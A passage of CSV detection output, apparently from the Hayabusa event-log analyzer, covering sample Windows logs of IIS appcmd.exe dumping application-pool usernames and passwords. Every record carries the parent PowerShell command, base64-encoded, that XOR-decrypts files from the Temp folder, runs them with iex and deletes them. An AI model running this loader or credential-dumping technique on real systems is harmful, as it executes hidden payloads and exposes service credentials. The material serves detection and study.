ZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHM